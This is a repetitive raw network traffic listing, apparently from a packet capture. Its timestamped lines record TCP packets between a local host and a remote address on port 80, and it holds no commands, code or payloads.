                                                                                                                                                                Dec 13, 2024 01:37:36.101650000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101674080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101692915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101737022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101763010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101778030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101809025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101824045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101866007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101888895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101917028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101931095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101958990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102168083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102205038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102219105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102242947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102256060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102284908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102298975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102324963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102345943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102360010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102391005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102406979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102427959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102442980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102467060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102490902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102507114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102531910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102545977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102672100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102704048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102719069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102746964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102761030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102783918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102804899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102837086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102864981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102879047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102905035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102921009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.102945089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103010893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103025913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103048086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103070974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103090048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103147030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103163004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103188038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103214025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103233099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103246927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103270054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103283882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103310108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103328943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103472948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103534937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103571892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103600979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103672028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103704929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103734016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103753090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103789091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103816986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103830099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103857994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103876114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.103909016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104042053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104069948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104083061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104110003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104182959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104212046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104227066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104254007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104311943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104346037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104376078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104398966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104434967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104449987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104485989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104504108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104522943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104543924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104558945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104588985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104604959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104629993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104644060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104669094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104744911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104779005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104792118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104816914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104831934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104863882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104888916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104902983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104924917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104938984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104965925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.104979992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105004072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105017900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105038881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105067015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105084896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105112076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105124950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105146885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105163097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105186939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105201960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105220079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105233908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105262041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105276108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105297089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105315924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105350018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105379105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105391026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105413914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105427027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105449915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105475903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105499983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105515003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105537891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105552912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105580091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105595112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105612993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105627060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105658054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105680943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105703115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105720997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105736971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105755091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105773926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105803013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105817080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105837107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105850935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105875969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105891943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105916977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105982065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.105997086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106026888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106049061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106060982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106084108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106097937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106122017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106138945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106162071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106175900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106192112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106213093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106236935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106256008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106264114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106285095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106309891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106333971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106348991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106372118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106388092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106414080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106432915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106446981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106463909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106484890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106513023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106525898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106548071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106561899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106580019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106607914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106623888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106646061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106659889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106681108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106697083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106719971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106734037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106754065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106770992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106798887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106812954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106837988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106853962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106873989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106899977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106918097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106941938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106956005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.106976032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107001066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107013941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107038021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107053041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107072115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107096910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107114077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107136011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107155085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107180119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107204914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107218981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107240915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107254982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107275963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107301950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107322931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107341051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107355118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107377052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107399940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107422113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107474089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107487917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107508898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107536077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107552052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107573986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107589006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107613087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107629061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107654095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107667923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107693911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107717037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107734919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107749939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107770920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107789993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107815981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107839108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107853889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107876062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107892036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107912064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107959032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107959032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107975006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.107991934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108006001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108031988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108046055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108067989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108083010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108107090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108120918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108144999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108160019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108187914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108202934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108230114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108248949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108267069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108294010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108308077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108335018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108361006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108374119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108397007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108412981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108453035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108469009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108499050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108513117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108536959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108562946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108582973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108649015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108676910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108707905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108735085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108758926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108906031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108931065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108953953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108979940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.108994961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109015942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109030962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109052896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109080076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109096050 CET4977580192.168.2.5185.81.68.147
